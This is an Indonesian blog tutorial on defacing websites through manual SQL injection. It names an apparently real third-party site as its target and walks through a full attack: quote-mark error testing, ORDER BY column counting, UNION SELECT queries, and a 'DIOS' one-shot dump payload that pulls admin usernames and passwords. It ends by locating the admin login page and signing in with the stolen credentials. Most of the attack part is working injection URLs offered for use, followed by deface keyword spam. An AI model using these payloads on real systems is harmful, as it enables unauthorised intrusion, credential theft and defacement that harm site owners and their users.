Header Ads

Tutorial SQLi Manual + Admin Finder

Halo Gan...

Kali ini Gw mau Share Tutorial Deface dengan SQLi. 
Sebenernya Buanyak bgt.. Ada google kalo mau cari.

Tapi Berhubung Posting gw Kemaren Dork SQLi Jadi gw buat sekalian tutorial Deface nya hehe.. Oke langsung aja.

Pertama elo Donlot dulu HackBar nya , Hackbar Modif 
Donlot DISINI  , 

Dorknya Elo bisa Pake :

New ! Site Vuln SQL 2017

Kumpulan Site Vuln SQL 2017 - Bag.2

Untuk Menutup & Membuka Hackbar Tekan f9.Dan Gw Disini Udah dapet Target. 

http://www.facialbaronline.com/services.php?p=1

Langsung tambahkan ['] di belakang URL 

> http://www.facialbaronline.com/services.php?p=1'

Lalu execute..


Kalo Vuln Biasanya Akan Seperti itu
Ada tulisan mysql_error()

Setelah itu Tambahkan [-] di depan ANGKA 1. Pada HackBar Pilih
UNION BASED > COLUMN COUNT > ORDER BY

Jadi Seperti ini
> http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+1--+


Pada Gambar Diatas Tidak Error & Sekarang Kita cari Error nya
Atau Batas Column nya.

Caranya 
+ORDER+BY+1--+ urutkan dari 1 sampai ketemu error/ batas column. jadi Seperti ini

> http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+1--+
> http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+2--+
> http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+3--+
> http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+4--+

Daan Seterusnya...





Web Target Gw Disini Berarti Column nya cuma sampe 9. Jadi Langsung ke Hackbar lg..



Pilih di Hackbar..
UNION BASED > UNION STATEMENT > INT,INT

Akan muncul popup.. Seperti ini, Karena Column web Gw 9.
Tulis Angka 9


Nanti Hackbar akan memberikan Perintah UNION. 
Jangan lupa tambakan [--+] di belakang URL

Jadi Seperti ini
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+


Muncul Angka Ajaib hehe.. Nanti Angka ini yg akan kita inject untuk Mendapatkan Datanya. 


http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+

Gw Pilih Yang No 2

http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,[Ini di ganti pake Dios Madblood],3,4,5,6,7,8,9--+



Di Hackbar.. pilih.
UNION BASED > DIOS MYSQL >> DIOS BY MADBLOOD

Jadinya Gini..
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+

Disini Udah kliatan Semua Tables nya. Gw juga Udah Nemu Column Username + Password nya.



Cara Mendapatkan Datanya.


information_schema.columns Diganti Dengan Admin
table_name Diganti menjadi Username
column_name Diganti Menjadi Password

http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+

Jadinya kek gini..

http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(Admin)where@:=export_set(5,export_set(5,@,username,0x3c6c693e,2),password,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+

Itu Username & Passwordnya

Setelah dapet Username + Password..Bingung cari admin login nya ? Terus Galau.. :D Nah Itu gw Bgt..

Kemaren gw sempet Post Mencari Login admin Dengan CMD di Windows. Langsung cek aja.. Jadi gw Saranin pake itu


Ga ada 1 menit langsung Ketemu...


Halaman Login nya ada di..
http://www.facialbaronline.com/administrator/

Langsung Masuk pake User + Pass yang tadi


Oke Terima kasih.. Sampe jumpa di tutorial selanjutnya

cara deface pemula,
cara deface dengan mudah,
cara hack website,
cara upload shell,
cara deface dengan bypass admin,
cara deface dengan jumping,
cara upload shell ke magento,
cara deface dengan magento,
cara deface dengan wordpress,
cara upload shell di wordpress,
trik deface dengan mudah,
cara menjadi hacker,
hacker paling berbahaya
Cara deface dengan SQL.

berita teknologi|hacked by | di hack oleh|anonymous|peretas|info teknologi|web kab|di retas|hacker|di deface|defacer|zone-h|motif

No comments:

Silahkan Komentar dengan bahasa yang sopan :)

Powered by Blogger.